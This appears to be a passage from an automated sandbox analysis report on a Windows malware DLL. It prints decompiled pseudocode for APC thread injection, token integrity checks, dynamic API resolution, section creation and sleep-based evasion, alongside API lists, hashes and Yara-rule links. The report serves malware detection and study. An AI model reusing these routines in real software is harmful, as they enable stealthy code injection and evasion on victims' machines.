				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                                                                                                  0x6e8d1553
                                                                                                                                  0x6e8d1559
                                                                                                                                  0x6e8d155d
                                                                                                                                  0x6e8d1568
                                                                                                                                  0x6e8d1570
                                                                                                                                  0x6e8d1579
                                                                                                                                  0x6e8d157d
                                                                                                                                  0x6e8d1584
                                                                                                                                  0x6e8d158b
                                                                                                                                  0x6e8d158d
                                                                                                                                  0x6e8d1593
                                                                                                                                  0x6e8d1570
                                                                                                                                  0x6e8d1597

                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNELBASE ref: 6E8D1553
                                                                                                                                  • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E8D1568
                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 6E8D1573
                                                                                                                                  • TerminateThread.KERNEL32(00000000,00000000), ref: 6E8D157D
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6E8D1584
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 6E8D158D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                  • String ID: @Mt MtTt
                                                                                                                                  • API String ID: 3832013932-608512568
                                                                                                                                  • Opcode ID: a3e12d27ea9e03ba0f8fe665f44db6d61d695f013d897db5bb330e5aba827574
                                                                                                                                  • Instruction ID: fac64c2c92b8789de26d2fa07770d40d233ac28258afc53ec452ae1ec4240553
                                                                                                                                  • Opcode Fuzzy Hash: a3e12d27ea9e03ba0f8fe665f44db6d61d695f013d897db5bb330e5aba827574
                                                                                                                                  • Instruction Fuzzy Hash: F0F0F872205A25BBDB125BE09C0CF9BBFA9FF1A751F004514F60D91190C7258C15CBE5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A34151, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A34151(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xa3d294 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00A375F6(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00A34AAB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                                                                                                  0x00a3415e
                                                                                                                                  0x00a34165
                                                                                                                                  0x00a3416c
                                                                                                                                  0x00a34180
                                                                                                                                  0x00a3418b
                                                                                                                                  0x00a341a3
                                                                                                                                  0x00a341b0
                                                                                                                                  0x00a341b3
                                                                                                                                  0x00a341b8
                                                                                                                                  0x00a341c3
                                                                                                                                  0x00a341c7
                                                                                                                                  0x00a341d6
                                                                                                                                  0x00a341da
                                                                                                                                  0x00a341f6
                                                                                                                                  0x00a341f6
                                                                                                                                  0x00a341fa
                                                                                                                                  0x00a341fa
                                                                                                                                  0x00a341ff
                                                                                                                                  0x00a34203
                                                                                                                                  0x00a34209
                                                                                                                                  0x00a3420a
                                                                                                                                  0x00a34211
                                                                                                                                  0x00a34217

                                                                                                                                  APIs
                                                                                                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00A34183
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00A341A3
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00A341B3
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A34203
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00A341D6
                                                                                                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00A341DE
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00A341EE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1295030180-0
                                                                                                                                  • Opcode ID: e2373dee8d6f0c12db50502d8c064a505ee38153a42010144a693e43922a49de
                                                                                                                                  • Instruction ID: b28e352b0054aa9d2be2a7e3c8551e51aa9fd25e5e152ecf90ff020f7875d9c9
                                                                                                                                  • Opcode Fuzzy Hash: e2373dee8d6f0c12db50502d8c064a505ee38153a42010144a693e43922a49de
                                                                                                                                  • Instruction Fuzzy Hash: AB215975900209FFEB10EFE4DD84EEEBBB9EB09704F0000A6F911A6161D7719A56DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D19C2, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D19C2(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E8D1000(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e8d41c4 + 0x6e8d5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e8d41c4 + 0x6e8d5151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E8D1397(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e8d41c4 + 0x6e8d5161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e8d41c4 + 0x6e8d5174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e8d41c4 + 0x6e8d5189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e8d41c4 + 0x6e8d519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E8D13B8(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                  0x6e8d19d0
                                                                                                                                  0x6e8d19d4
                                                                                                                                  0x6e8d1a95
                                                                                                                                  0x6e8d19da
                                                                                                                                  0x6e8d19f2
                                                                                                                                  0x6e8d1a01
                                                                                                                                  0x6e8d1a08
                                                                                                                                  0x6e8d1a0a
                                                                                                                                  0x6e8d1a0f
                                                                                                                                  0x6e8d1a8d
                                                                                                                                  0x6e8d1a8e
                                                                                                                                  0x6e8d1a11
                                                                                                                                  0x6e8d1a1e
                                                                                                                                  0x6e8d1a20
                                                                                                                                  0x6e8d1a25
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1a27
                                                                                                                                  0x6e8d1a34
                                                                                                                                  0x6e8d1a36
                                                                                                                                  0x6e8d1a3b
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1a3d
                                                                                                                                  0x6e8d1a4a
                                                                                                                                  0x6e8d1a4c
                                                                                                                                  0x6e8d1a51
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1a53
                                                                                                                                  0x6e8d1a60
                                                                                                                                  0x6e8d1a62
                                                                                                                                  0x6e8d1a67
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1a69
                                                                                                                                  0x6e8d1a6f
                                                                                                                                  0x6e8d1a75
                                                                                                                                  0x6e8d1a7a
                                                                                                                                  0x6e8d1a7f
                                                                                                                                  0x6e8d1a84
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1a86
                                                                                                                                  0x6e8d1a89
                                                                                                                                  0x6e8d1a89
                                                                                                                                  0x6e8d1a84
                                                                                                                                  0x6e8d1a67
                                                                                                                                  0x6e8d1a51
                                                                                                                                  0x6e8d1a3b
                                                                                                                                  0x6e8d1a25
                                                                                                                                  0x6e8d1a0f
                                                                                                                                  0x6e8d1aa3

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8D1000: HeapAlloc.KERNEL32(00000000,?,6E8D15ED,00000030,74E063F0,00000000), ref: 6E8D100C
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E8D1051,?,?,?,?), ref: 6E8D19E6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A08
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A1E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A34
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A4A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A60
                                                                                                                                    • Part of subcall function 6E8D13B8: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 6E8D1415
                                                                                                                                    • Part of subcall function 6E8D13B8: memset.NTDLL ref: 6E8D1437
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1632424568-0
                                                                                                                                  • Opcode ID: 0f15332d3939e560c00237a559ef95ca479a52d15e0f2b5e182c22c70c814afa
                                                                                                                                  • Instruction ID: 107087f66c352e5a03e75107ed3ae6c5345916096e757059b9be0dc398e22d72
                                                                                                                                  • Opcode Fuzzy Hash: 0f15332d3939e560c00237a559ef95ca479a52d15e0f2b5e182c22c70c814afa
                                                                                                                                  • Instruction Fuzzy Hash: 03216BB0600B0BEFDB11EFA9CD80D9AB7ECEF452107014966E458E7251E730E909CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3262F, Relevance: 9.1, APIs: 6, Instructions: 61sleepmemorytimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E00A3262F(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0xa3d270 = _t10;
				if(_t10 != 0) {
					 *0xa3d160 = GetTickCount();
					_t12 = E00A31A24(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L00A3B02E();
							_t34 = _t14 + _t16;
							_t18 = E00A34F23(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E00A327C7(_t26) != 0) {
							 *0xa3d298 = 1; // executed
						}
						_t12 = E00A3520D(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                                                                                                  0x00a3262f
                                                                                                                                  0x00a32635
                                                                                                                                  0x00a32636
                                                                                                                                  0x00a32642
                                                                                                                                  0x00a32648
                                                                                                                                  0x00a3264f
                                                                                                                                  0x00a3265f
                                                                                                                                  0x00a32664
                                                                                                                                  0x00a3266b
                                                                                                                                  0x00a3266d
                                                                                                                                  0x00a32672
                                                                                                                                  0x00a32678
                                                                                                                                  0x00a3267e
                                                                                                                                  0x00a32688
                                                                                                                                  0x00a3268c
                                                                                                                                  0x00a3268e
                                                                                                                                  0x00a32693
                                                                                                                                  0x00a32694
                                                                                                                                  0x00a32695
                                                                                                                                  0x00a3269a
                                                                                                                                  0x00a326a0
                                                                                                                                  0x00a326ab
                                                                                                                                  0x00a326ac
                                                                                                                                  0x00a326b2
                                                                                                                                  0x00a326b8
                                                                                                                                  0x00a326c4
                                                                                                                                  0x00a326c6
                                                                                                                                  0x00a326c6
                                                                                                                                  0x00a326d0
                                                                                                                                  0x00a326d0
                                                                                                                                  0x00a32651
                                                                                                                                  0x00a32653
                                                                                                                                  0x00a32653
                                                                                                                                  0x00a326da

                                                                                                                                  APIs
                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00A31900,?), ref: 00A32642
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00A32656
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00A31900,?), ref: 00A32672
                                                                                                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,00A31900,?), ref: 00A32678
                                                                                                                                  • _aullrem.NTDLL(?,?,00000013,00000000), ref: 00A32695
                                                                                                                                  • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,00A31900,?), ref: 00A326B2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 507476733-0
                                                                                                                                  • Opcode ID: a707bab7fcff4bb828d443eb68bfc7675a11cf50aadc49dda1d881d0b87bc173
                                                                                                                                  • Instruction ID: 10b25f6d828e2494c01fca3aa316eb4ec301eb8a116be069dd08ef1eaf6d6139
                                                                                                                                  • Opcode Fuzzy Hash: a707bab7fcff4bb828d443eb68bfc7675a11cf50aadc49dda1d881d0b87bc173
                                                                                                                                  • Instruction Fuzzy Hash: 5011E972A40304ABD7149BF4EC1BF5A77E8EB48361F100125FA05D6190FBB0D44187A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A34F07, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120synchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                  			E00A34F07(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				void* _t46;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				long _t54;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_t46 =  *0xa3d130(0, 1,  &_v24); // executed
							if(_t46 != 0) {
								_v8 = 8;
							} else {
								_t47 = E00A375F6(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0xa3d2a4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E00A34AAB(_v20);
											if(_v8 == 0) {
												_t54 = E00A33B3F(_v24, _t74); // executed
												_v8 = _t54;
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E00A3121A(__eax); // executed
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}



























                                                                                                                                  0x00a34f08
                                                                                                                                  0x00a34f0e
                                                                                                                                  0x00a34f19
                                                                                                                                  0x00a34f19
                                                                                                                                  0x00a34f1b
                                                                                                                                  0x00a37613
                                                                                                                                  0x00a37616
                                                                                                                                  0x00a3761f
                                                                                                                                  0x00a37622
                                                                                                                                  0x00a37625
                                                                                                                                  0x00a3762d
                                                                                                                                  0x00a3772b
                                                                                                                                  0x00a37731
                                                                                                                                  0x00a37739
                                                                                                                                  0x00a3773b
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3773b
                                                                                                                                  0x00a37633
                                                                                                                                  0x00a37636
                                                                                                                                  0x00a3773e
                                                                                                                                  0x00a3773e
                                                                                                                                  0x00a3763c
                                                                                                                                  0x00a37643
                                                                                                                                  0x00a3764b
                                                                                                                                  0x00a37722
                                                                                                                                  0x00a37651
                                                                                                                                  0x00a37657
                                                                                                                                  0x00a3765c
                                                                                                                                  0x00a37661
                                                                                                                                  0x00a37710
                                                                                                                                  0x00a37667
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37667
                                                                                                                                  0x00a37667
                                                                                                                                  0x00a37667
                                                                                                                                  0x00a37667
                                                                                                                                  0x00a3766c
                                                                                                                                  0x00a3766e
                                                                                                                                  0x00a3766e
                                                                                                                                  0x00a3767b
                                                                                                                                  0x00a37683
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37685
                                                                                                                                  0x00a37692
                                                                                                                                  0x00a37698
                                                                                                                                  0x00a37698
                                                                                                                                  0x00a3769b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3769d
                                                                                                                                  0x00a376a8
                                                                                                                                  0x00a376bc
                                                                                                                                  0x00a376f2
                                                                                                                                  0x00a376be
                                                                                                                                  0x00a376be
                                                                                                                                  0x00a376c5
                                                                                                                                  0x00a376cd
                                                                                                                                  0x00000000
                                                                                                                                  0x00a376cf
                                                                                                                                  0x00a376cf
                                                                                                                                  0x00a376d5
                                                                                                                                  0x00a376dd
                                                                                                                                  0x00a376e4
                                                                                                                                  0x00000000
                                                                                                                                  0x00a376e4
                                                                                                                                  0x00a376dd
                                                                                                                                  0x00a376cd
                                                                                                                                  0x00a376f5
                                                                                                                                  0x00a376f8
                                                                                                                                  0x00a37700
                                                                                                                                  0x00a37706
                                                                                                                                  0x00a3770b
                                                                                                                                  0x00a3770b
                                                                                                                                  0x00000000
                                                                                                                                  0x00a37700
                                                                                                                                  0x00a376a5
                                                                                                                                  0x00000000
                                                                                                                                  0x00a376e7
                                                                                                                                  0x00a376e7
                                                                                                                                  0x00000000
                                                                                                                                  0x00a376f0
                                                                                                                                  0x00a37717
                                                                                                                                  0x00a37717
                                                                                                                                  0x00a3771d
                                                                                                                                  0x00a3771d
                                                                                                                                  0x00a3764b
                                                                                                                                  0x00a37636
                                                                                                                                  0x00a37748
                                                                                                                                  0x00a34f10
                                                                                                                                  0x00a34f10
                                                                                                                                  0x00a34f17
                                                                                                                                  0x00a34f22
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a34f17

                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000), ref: 00A376AF
                                                                                                                                  • GetLastError.KERNEL32 ref: 00A376CF
                                                                                                                                    • Part of subcall function 00A3121A: wcstombs.NTDLL ref: 00A312DC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastObjectSingleWaitwcstombs
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 2344289193-3251738875
                                                                                                                                  • Opcode ID: e7f64f2866c93fb452088f44aad2977a37d4470c4f6fd8ee9d0523c8cce31c1d
                                                                                                                                  • Instruction ID: ec62a678b44a1f870ed647d6c299fb4b4b89ebf95e0cded13159780cd18fa7a4
                                                                                                                                  • Opcode Fuzzy Hash: e7f64f2866c93fb452088f44aad2977a37d4470c4f6fd8ee9d0523c8cce31c1d
                                                                                                                                  • Instruction Fuzzy Hash: BD412AB5904219EFDF20EFA8DD859AEBBB8FB04344F204869F402E3111D7309E41DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A39311, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                  			E00A39311(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0xa3d364; // 0x33a95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xa3d364; // 0x33a95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0xa3d030) {
					HeapFree( *0xa3d270, 0, _t8);
				}
				_t9 = E00A35141(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0xa3d364; // 0x33a95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                                                                                                                  0x00a39311
                                                                                                                                  0x00a39311
                                                                                                                                  0x00a3931a
                                                                                                                                  0x00a3932a
                                                                                                                                  0x00a3932a
                                                                                                                                  0x00a3932f
                                                                                                                                  0x00a39334
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a39324
                                                                                                                                  0x00a39324
                                                                                                                                  0x00a39336
                                                                                                                                  0x00a3933a
                                                                                                                                  0x00a3934c
                                                                                                                                  0x00a3934c
                                                                                                                                  0x00a39357
                                                                                                                                  0x00a3935c
                                                                                                                                  0x00a3935f
                                                                                                                                  0x00a39364
                                                                                                                                  0x00a39368
                                                                                                                                  0x00a3936e

                                                                                                                                  APIs
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(033A9570), ref: 00A3931A
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00A35390), ref: 00A39324
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,00A35390), ref: 00A3934C
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(033A9570), ref: 00A39368
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 58946197-8415677
                                                                                                                                  • Opcode ID: 3914f0dcd4129cd7b05b4865ec809339163a0764a77c01ec44a6a2dec114dfe8
                                                                                                                                  • Instruction ID: 61b4936e0d3fe9a9b13c67779c1fea49b3f4a14074ca1985a303c4d6f1f00944
                                                                                                                                  • Opcode Fuzzy Hash: 3914f0dcd4129cd7b05b4865ec809339163a0764a77c01ec44a6a2dec114dfe8
                                                                                                                                  • Instruction Fuzzy Hash: F1F0D4B1A04280DBEB28DFB9EE89B163BA4BB16740F044418B552DB2A1C760DD52CB15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A3520D, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                  			E00A3520D(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00A3154A();
				if(_t21 != 0) {
					_t59 =  *0xa3d294; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
